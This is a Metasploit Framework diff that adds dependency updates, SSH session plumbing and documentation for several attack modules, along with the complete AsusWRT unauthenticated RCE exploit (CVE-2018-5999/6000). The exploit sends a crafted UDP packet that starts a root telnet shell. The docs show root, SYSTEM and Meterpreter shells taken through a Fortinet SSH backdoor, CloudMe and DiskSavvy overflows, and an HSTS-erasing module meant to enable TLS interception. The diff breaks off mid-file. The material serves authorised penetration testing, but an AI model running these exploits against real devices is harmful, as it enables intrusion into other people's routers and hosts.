diff --git a/Gemfile.lock b/Gemfile.lock index 4e5e66856a..0d502baa64 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -59,7 +59,7 @@ PATH rex-text rex-zip ruby-macho - ruby_smb + ruby_smb (= 0.0.18) rubyntlm rubyzip sqlite3 @@ -125,11 +125,11 @@ GEM railties (>= 3.0.0) faker (1.8.7) i18n (>= 0.7) - faraday (0.13.1) + faraday (0.14.0) multipart-post (>= 1.2, < 3) filesize (0.1.1) fivemat (1.3.5) - google-protobuf (3.5.1) + google-protobuf (3.5.1.2) googleapis-common-protos-types (1.0.1) google-protobuf (~> 3.0) googleauth (0.6.2) @@ -140,12 +140,12 @@ GEM multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.8.3) + grpc (1.9.1) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) googleauth (>= 0.5.1, < 0.7) hashery (2.1.2) - i18n (0.9.1) + i18n (0.9.5) concurrent-ruby (~> 1.0) jsobfu (0.4.2) rkelly-remix @@ -155,7 +155,7 @@ GEM logging (2.2.2) little-plugger (~> 1.1) multi_json (~> 1.10) - loofah (2.1.1) + loofah (2.2.0) crass (~> 1.0.2) nokogiri (>= 1.5.9) memoist (0.16.0) @@ -167,7 +167,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-credential (2.0.12) + metasploit-credential (2.0.13) metasploit-concern metasploit-model metasploit_data_models @@ -194,7 +194,7 @@ GEM metasploit_payloads-mettle (0.3.7) method_source (0.9.0) mini_portile2 (2.3.0) - minitest (5.11.1) + minitest (5.11.3) mqtt (0.5.0) msgpack (1.2.2) multi_json (1.13.1) @@ -203,7 +203,7 @@ GEM net-ssh (4.2.0) network_interface (0.0.2) nexpose (7.2.0) - nokogiri (1.8.1) + nokogiri (1.8.2) mini_portile2 (~> 2.3.0) octokit (4.8.0) sawyer (~> 0.8.0, >= 0.5.3) @@ -214,7 +214,7 @@ GEM pcaprub patch_finder (1.0.2) pcaprub (0.12.4) - pdf-reader (2.0.0) + pdf-reader (2.1.0) Ascii85 (~> 1.0.0) afm (~> 0.2.1) hashery (~> 2.0) @@ -229,7 +229,7 @@ GEM pry (0.11.3) coderay (~> 1.1.0) method_source (~> 0.9.0) - public_suffix (3.0.1) + public_suffix (3.0.2) rack (1.6.8) rack-test (0.6.3) rack (>= 1.0) @@ -320,7 +320,7 @@ GEM rspec-support (~> 3.7.0) rspec-rerun (1.1.0) rspec (~> 3.0) - rspec-support (3.7.0) + rspec-support (3.7.1) ruby-macho (1.1.0) ruby-rc4 (0.1.5) ruby_smb (0.0.18) @@ -348,7 +348,7 @@ GEM thread_safe (0.3.6) timecop (0.9.1) ttfunk (1.5.1) - tzinfo (1.2.4) + tzinfo (1.2.5) thread_safe (~> 0.1) tzinfo-data (1.2018.3) tzinfo (>= 1.0.0) diff --git a/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md new file mode 100644 index 0000000000..c1738306e8 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md @@ -0,0 +1,63 @@ +## Intro + +This module scans for the Fortinet SSH backdoor and creates sessions. + +## Setup + +1. `git clone https://github.com/nixawk/labs` +2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware +3. + +## Usage + +``` +msf5 > use auxiliary/scanner/ssh/fortinet_backdoor +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24 +rhosts => 192.168.212.0/24 +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100 +threads => 100 +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run + +[*] Scanned 54 of 256 hosts (21% complete) +[+] 192.168.212.128:22 - Logged in as Fortimanager_Access +[*] Scanned 65 of 256 hosts (25% complete) +[*] Scanned 78 of 256 hosts (30% complete) +[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600 +[*] Scanned 104 of 256 hosts (40% complete) +[*] Scanned 141 of 256 hosts (55% complete) +[*] Scanned 154 of 256 hosts (60% complete) +[*] Scanned 180 of 256 hosts (70% complete) +[*] Scanned 205 of 256 hosts (80% complete) +[*] Scanned 240 of 256 hosts (93% complete) +[*] Scanned 256 of 256 hosts (100% complete) +[*] Auxiliary module execution completed +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1 +[*] Starting interaction with 1... + +FortiGate-VM # get system status +Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4) +Virus-DB: 16.00560(2012-10-19 08:31) +Extended DB: 1.00000(2012-10-17 15:46) +Extreme DB: 1.00000(2012-10-17 15:47) +IPS-DB: 4.00345(2013-05-23 00:39) +IPS-ETDB: 0.00000(2000-00-00 00:00) +Serial-Number: FGVM00UNLICENSED +Botnet DB: 1.00000(2012-05-28 22:51) +License Status: Evaluation license expired +Evaluation License Expires: Thu Jan 28 13:05:41 2016 +BIOS version: 04000002 +Log hard disk: Need format +Hostname: FortiGate-VM +Operation Mode: NAT +Current virtual domain: root +Max number of virtual domains: 10 +Virtual domains status: 1 in NAT mode, 0 in TP mode +Virtual domain configuration: disable +FIPS-CC mode: disable +Current HA mode: standalone +Branch point: 228 +Release Version Information: GA Patch 4 +System time: Wed Feb 21 13:13:43 2018 + +FortiGate-VM # +``` diff --git a/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md new file mode 100644 index 0000000000..914f862489 --- /dev/null +++ b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md @@ -0,0 +1,70 @@ +## Description + + This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`. + + +## Vulnerable Application + + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode. + + This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user. + + This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743. + + Numerous ASUS models are reportedly affected, but untested. + + +## Verification Steps + + 1. Start `msfconsole` + 2. `use exploits/linux/http/asuswrt_lan_rce` + 3. `set RHOST [IP]` + 4. `run` + 5. You should get a *root* session + + +## Options + + **ASUSWRTPORT** + + AsusWRT HTTP portal port (default: `80`) + + +## Scenarios +msf > use exploit/linux/http/asuswrt_lan_rce +msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205 +rhost => 192.168.132.205 +msf exploit(linux/http/asuswrt_lan_rce) > run + +[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable. +[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332 +[+] 192.168.132.205:9999 - Success, shell incoming! +[*] Found shell. +[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600 + +id +id +/bin/sh: id: not found +/ # cat /proc/cpuinfo +cat /proc/cpuinfo +system type : Broadcom BCM53572 chip rev 1 pkg 8 +processor : 0 +cpu model : MIPS 74K V4.9 +BogoMIPS : 149.91 +wait instruction : no +microsecond timers : yes +tlb_entries : 32 +extra interrupt vector : no +hardware watchpoint : yes +ASEs implemented : mips16 dsp +shadow register sets : 1 +VCED exceptions : not available +VCEI exceptions : not available + +unaligned_instructions : 0 +dcache hits : 2147483648 +dcache misses : 0 +icache hits : 2147483648 +icache misses : 0 +instructions : 2147483648 +/ # diff --git a/documentation/modules/exploit/windows/misc/cloudme_sync.md b/documentation/modules/exploit/windows/misc/cloudme_sync.md new file mode 100644 index 0000000000..dad36f3df3 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md @@ -0,0 +1,41 @@ +## Description +This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe). + +## Verification Steps + 1. Install CloudMe for Desktop version `v1.10.9` + 2. Start the applicaton (you don't need to create an account) + 3. Start `msfconsole` + 4. Do `use exploit/windows/misc/cloudme_sync` + 5. Do `set RHOST ip` + 6. Do `set LHOST ip` + 7. Do `exploit` + 8. Verify the Meterpreter session is opened + +## Scenarios + +### CloudMe Sync client application on Windows 7 SP1 x86 + +``` +msf > use exploit/windows/misc/cloudme_sync +msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148 +RHOST => 172.16.40.148 +msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp +PAYLOAD => windows/meterpreter/reverse_tcp +msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5 +LHOST => 172.16.40.5 +msf exploit(windows/misc/cloudme_sync) > exploit + +[*] Started reverse TCP handler on 172.16.40.5:4444 +[*] Sending stage (179779 bytes) to 172.16.40.148 +[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000 + +meterpreter > sysinfo +Computer : PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x86 +System Language : pt_PT +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x86/windows +meterpreter > +``` diff --git a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md new file mode 100644 index 0000000000..056f7bdd15 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md @@ -0,0 +1,39 @@ +## Vulnerable Application + +[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe). + +## Verification Steps + 1. Install a vulnerable DiskSavvy Enterprise + 2. Start `msfconsole` + 3. Do `use exploit/windows/misc/disk_savvy_adm` + 4. Do `set RHOST ip` + 5. Do `set PAYLOAD windows/shell/bind_tcp` + 6. Do `exploit` + 7. Enjoy your shell + +## Scenarios + +### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86 + +``` +msf > use exploit/windows/misc/disk_savvy_adm +msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55 +RHOST => 192.168.216.55 +msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp +payload => windows/shell/bind_tcp +msf exploit(windows/misc/disk_savvy_adm) > exploit + +[*] Started bind handler +[*] Encoded stage with x86/shikata_ga_nai +[*] Sending encoded stage (267 bytes) to 192.168.216.55 +[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500 + +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Windows\system32>whoami +whoami +nt authority\system + +C:\Windows\system32> +``` diff --git a/documentation/modules/post/multi/manage/hsts_eraser.md b/documentation/modules/post/multi/manage/hsts_eraser.md new file mode 100644 index 0000000000..b55a080344 --- /dev/null +++ b/documentation/modules/post/multi/manage/hsts_eraser.md @@ -0,0 +1,62 @@ +This module allows you to erase the [HTTP Strict-Transport-Security](https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security) cache of a target machine. When combined with a sniffer or a man-in-the-middle tool, this module will assist with the capture/modification of TLS-encrypted traffic. + +**WARNING:** This module _erases_ the HSTS cache, leaving the target in a vulnerable state. All browser traffic from all users on the target will be subject to man-in-the-middle attacks. There is no undo built-into this module. If you intend to revert, you must first backup the HSTS file before running the module. + +Note: This module searches for all non-root users on the system. It will not erase HSTS data for the root user. + +## Vulnerable Application + +The following platforms are supported: +* Windows +* Linux +* OS X + +## Verification Steps + +1. Obtain and background a session from the target machine. +2. From the `msf>` prompt, do ```use post/multi/manage/hsts_eraser``` +3. Set the ```DISCLAIMER``` option to ```True``` (after reading the above **WARNING**) +4. Set the ```SESSION``` option +5. ```run``` + +Alternatively: + +1. Obtain a session from the target machine. +2. From the `meterpreter>` prompt, do ```run post/multi/manage/hsts_eraser DISCLAIMER=True``` + +## Demo + +Set up a Kali VM with some HSTS data: + +```bash +root@kali-2017:~# adduser bob +root@kali-2017:~# su bob +bob@kali-2017:/root$ cd + +bob@kali-2017:~$ wget -S https://outlook.live.com/owa/ 2>&1 | grep -i strict + Strict-Transport-Security: max-age=31536000; includeSubDomains + Strict-Transport-Security: max-age=31536000; includeSubDomains +bob@kali-2017:~$ cat .wget-hsts +# HSTS 1.0 Known Hosts database for GNU Wget. +# Edit at your own risk. +# +outlook.live.com 0 1 1519176414 31536000 +``` + +Create an `msfvenom` payload, execute it, and then connect to it with `multi/exploit/handler`. From the Meterpreter session on the victim: + +``` +[*] Meterpreter session 1 opened (127.0.0.1:38089 -> 127.0.0.1:44444) at 2018-02-20 19:19:02 -0600 + +meterpreter > run post/multi/manage/hsts_eraser DISCLAIMER=True + +[*] Removing wget HSTS database for bob... +[*] HSTS databases removed! Now enjoy your favorite sniffer! ;-) +``` + +Confirm that the file was deleted: + +```bash +bob@kali-2017:~$ cat .wget-hsts +cat: .wget-hsts: No such file or directory +``` diff --git a/lib/msf/core/exploit/fortinet.rb b/lib/msf/core/exploit/fortinet.rb index 9b8aae1f9c..6072eccbff 100644 --- a/lib/msf/core/exploit/fortinet.rb +++ b/lib/msf/core/exploit/fortinet.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- +# https://www.ietf.org/rfc/rfc4252.txt # https://www.ietf.org/rfc/rfc4256.txt require 'net/ssh' @@ -11,21 +12,21 @@ module Msf::Exploit::Remote::Fortinet USERAUTH_INFO_RESPONSE = 61 def authenticate(service_name, username = 'Fortimanager_Access', password = nil) - debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } + debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' } send_message(userauth_request( =begin - string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) - string service name (US-ASCII) - string "keyboard-interactive" (US-ASCII) - string language tag (as defined in [RFC-3066]) - string submethods (ISO-10646 UTF-8) + string user name + string service name + string "password" + boolean FALSE + string plaintext password in ISO-10646 UTF-8 encoding [RFC3629] =end username, service_name, - 'keyboard-interactive', - '', - '' + 'password', + false, + password || '' )) loop do @@ -37,7 +38,22 @@ module Msf::Exploit::Remote::Fortinet return true when USERAUTH_FAILURE debug { 'Received SSH_MSG_USERAUTH_FAILURE' } - return false + debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' } + + send_message(userauth_request( +=begin + string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) + string service name (US-ASCII) + string "keyboard-interactive" (US-ASCII) + string language tag (as defined in [RFC-3066]) + string submethods (ISO-10646 UTF-8) +=end + username, + service_name, + 'keyboard-interactive', + '', + '' + )) when USERAUTH_INFO_REQUEST debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py index 56b6781b23..6470effe0e 100644 --- a/lib/msf/core/modules/external/python/metasploit/module.py +++ b/lib/msf/core/modules/external/python/metasploit/module.py @@ -29,7 +29,7 @@ def report_vuln(ip, name, **opts): def run(metadata, module_callback): - req = json.loads(os.read(0, 10000)) + req = json.loads(os.read(0, 10000).decode("utf-8")) if req['method'] == 'describe': rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}) elif req['method'] == 'run': diff --git a/lib/net/ssh/command_stream.rb b/lib/net/ssh/command_stream.rb index f9d82cd518..11ef475d28 100644 --- a/lib/net/ssh/command_stream.rb +++ b/lib/net/ssh/command_stream.rb @@ -15,7 +15,34 @@ class CommandStream attr_accessor :localinfo end - def initialize(ssh, cmd, cleanup = false) + def shell_requested(channel, success) + raise "could not request ssh shell" unless success + channel[:data] = '' + + channel.on_eof do + self.rsock.close rescue nil + self.ssh.close rescue nil + self.thread.kill + end + + channel.on_close do + self.rsock.close rescue nil + self.ssh.close rescue nil + self.thread.kill + end + + channel.on_data do |ch,data| + self.rsock.write(data) + end + + channel.on_extended_data do |ch, ctype, data| + self.rsock.write(data) + end + + self.channel = channel + end + + def initialize(ssh, cmd = nil, cleanup = true) self.lsock, self.rsock = Rex::Socket.tcp_socket_pair() self.lsock.extend(Rex::IO::Stream) @@ -23,7 +50,7 @@ class CommandStream self.rsock.extend(Rex::IO::Stream) self.ssh = ssh - self.thread = Thread.new(ssh,cmd,cleanup) do |rssh,rcmd,rcleanup| + self.thread = Thread.new(ssh,cmd,cleanup) do |rssh, rcmd, rcleanup| begin info = rssh.transport.socket.getpeername_as_array @@ -33,32 +60,10 @@ class CommandStream self.lsock.localinfo = "#{info[1]}:#{info[2]}" rssh.open_channel do |rch| - rch.exec(rcmd) do |c, success| - raise "could not execute command: #{rcmd.inspect}" unless success - - c[:data] = '' - - c.on_eof do - self.rsock.close rescue nil - self.ssh.close rescue nil - self.thread.kill - end - - c.on_close do - self.rsock.close rescue nil - self.ssh.close rescue nil - self.thread.kill - end - - c.on_data do |ch,data| - self.rsock.write(data) - end - - c.on_extended_data do |ch, ctype, data| - self.rsock.write(data) - end - - self.channel = c + if cmd.nil? + rch.send_channel_request("shell", &method(:shell_requested)) + else + rch.exec(rsh, &method(:shell_requested)) end end @@ -85,7 +90,7 @@ class CommandStream end # Shut down the SSH session if requested - if(rcleanup) + if rcleanup rssh.close end end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 6ab2274e03..4837f25845 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -127,7 +127,7 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'mqtt' spec.add_runtime_dependency 'net-ssh' spec.add_runtime_dependency 'bcrypt_pbkdf' - spec.add_runtime_dependency 'ruby_smb' + spec.add_runtime_dependency 'ruby_smb', '0.0.18' # # REX Libraries diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index fbe018977d..6873c06844 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary finger_zero finger_dot finger_chars - vprint_status "#{rhost}:#{rport} - Sending finger request for user list: #{finger_user_common.join(", ")}" + vprint_status "#{rhost}:#{rport} - Sending finger request for #{finger_user_common.count} users" finger_list rescue ::Rex::ConnectionError @@ -168,22 +168,21 @@ class MetasploitModule < Msf::Auxiliary # No such file or directory == valid user bad utmp - # Solaris - if(line =~ /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/) + + case line + when /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/ + # Solaris uid = $1 if ($2 != "Name") @users[uid] ||= {} end - end - # IRIX - if(line =~ /^\s*Login name:\s*([^\s]+)\s+/i) + when /^\s*Login name:\s*([^\s]+)\s+/i + # IRIX uid = $1 @users[uid] ||= {} if uid - end - - # Debian GNU/Linux - if(line =~ /^\s*Username:\s*([^\s]+)\s+/i) + when /^\s*(?:Username|Login):\s*([^\s]+)\s+/i + # Debian GNU/Linux uid = $1 @users[uid] ||= {} if uid end diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index aa41da8017..9c335006d4 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -232,7 +232,7 @@ class MetasploitModule < Msf::Auxiliary # No password change required moving on. # Check for valid login but no mailbox setup print_good("server type: #{res.headers["X-FEServer"]}") - if res.headers['location'] =~ /owa/ + if res.headers['location'] =~ /owa/ and res.headers['location'] !~ /reason/ print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}'") report_cred( ip: res.peerinfo['addr'], diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index e06d3100f5..70e83503f2 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -3,10 +3,14 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +# XXX: This shouldn't be necessary but is now +require 'net/ssh/command_stream' + class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SSH include Msf::Exploit::Remote::Fortinet include Msf::Auxiliary::Scanner + include Msf::Auxiliary::CommandShell include Msf::Auxiliary::Report def initialize(info = {}) @@ -45,6 +49,8 @@ class MetasploitModule < Msf::Auxiliary ssh_opts = { port: rport, + # The auth method is converted into a class name for instantiation, + # so fortinet-backdoor here becomes FortinetBackdoor from the mixin auth_methods: ['fortinet-backdoor'], non_interactive: true, config: false, @@ -63,15 +69,33 @@ class MetasploitModule < Msf::Auxiliary return end - if ssh - print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") - report_vuln( - host: ip, - name: self.name, - refs: self.references, - info: ssh.transport.server_version.version - ) - end + return unless ssh + + print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") + + version = ssh.transport.server_version.version + + report_vuln( + host: ip, + name: self.name, + refs: self.references, + info: version + ) + + shell = Net::SSH::CommandStream.new(ssh) + + return unless shell + + info = "Fortinet SSH Backdoor (#{version})" + + ds_merge = { + 'USERNAME' => 'Fortimanager_Access' + } + + start_session(self, info, ds_merge, false, shell.lsock) + + # XXX: Ruby segfaults if we don't remove the SSH socket + remove_socket(ssh.transport.socket) end def rport diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index b495195fb5..79d5b38083 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary return unless ssh_socket # Create a new session - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) merge_me = { 'USERPASS_FILE' => nil, diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index f0b271e46a..703e8b9094 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary return unless ssh_socket # Create a new session from the socket - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) # Clean up the stored data - need to stash the keyfile into # a datastore for later reuse. diff --git a/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py b/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py index 0dfa7558d9..4b5bab7f6b 100755 --- a/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py +++ b/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py @@ -9,9 +9,13 @@ import os import ssl # extra modules -import gmpy2 -from cryptography import x509 -from cryptography.hazmat.backends import default_backend +dependencies_missing = False +try: + import gmpy2 + from cryptography import x509 + from cryptography.hazmat.backends import default_backend +except ImportError: + dependencies_missing = True from metasploit import module @@ -151,6 +155,10 @@ def oracle(target, pms, cke_2nd_prefix, cipher_handshake=ch_def, messageflow=Fal def run(args): + if dependencies_missing: + module.log("Module dependencies (gmpy2 and cryptography python libraries) missing, cannot continue", level='error') + return + target = (args['rhost'], int(args['rport'])) timeout = float(args['timeout']) cipher_handshake = cipher_handshakes[args['cipher_group']] diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 781db9a106..e0ac301d69 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb new file mode 100644 index 0000000000..66440322dc --- /dev/null +++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution', + 'Description' => %q{ + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to + perform a POST in certain cases. This can be combined with another vulnerability in + the VPN configuration upload routine that sets NVRAM configuration variables directly + from the POST request to enable a special command mode. + This command mode can then be abused by sending a UDP packet to infosvr, which is running + on port UDP 9999 to directly execute commands as root. + This exploit leverages that to start telnetd in a random port, and then connects to it. + It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743. + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'], + ['CVE', '2018-5999'], + ['CVE', '2018-6000'] + ], + 'Targets' => + [ + [ 'AsusWRT < v3.0.0.4.384.10007', + { + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + } + ], + ], + 'Privileged' => true, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DisclosureDate' => 'Jan 22 2018', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(9999) + ]) + + register_advanced_options( + [ + OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80]) + ]) + end + + def exploit + # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD + # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting! + post_data = Rex::MIME::Message.new + post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"") + + data = post_data.to_s + + res = send_request_cgi({ + 'uri' => "/vpnupload.cgi", + 'method' => 'POST', + 'rport' => datastore['ASUSWRTPORT'], + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + if res and res.code == 200 + print_good("#{peer} - Successfully set the ateCommand_flag variable.") + else + fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.") + end + + + # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above. + info_pdu_size = 512 # expected packet size, not sure what the extra bytes are + r = Random.new + + ibox_comm_pkt_hdr_ex = + [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC + [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 + [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 + r.bytes(4) + # Info, don't know what this is + r.bytes(6) + # MAC address + r.bytes(32) # Password + + telnet_port = rand((2**16)-1024)+1024 + cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*') + pkt_syscmd = + [cmd.length,0x00].pack('C*') + # cmd length + cmd # our command + + pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) + + connect_udp + udp_sock.put(pkt_final) # we could process the response, but we don't care + disconnect_udp + + print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}") + sleep(10) + + begin + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) + if not sock.nil? + print_good("#{peer} - Success, shell incoming!") + return handler(sock) + end + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + sock.close if sock + end + + print_bad("#{peer} - Well that didn't work... try again?") + end +end diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index b4f9e873e8..96864ee5b4 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index f2304c91a6..5742000cc3 100644 --- 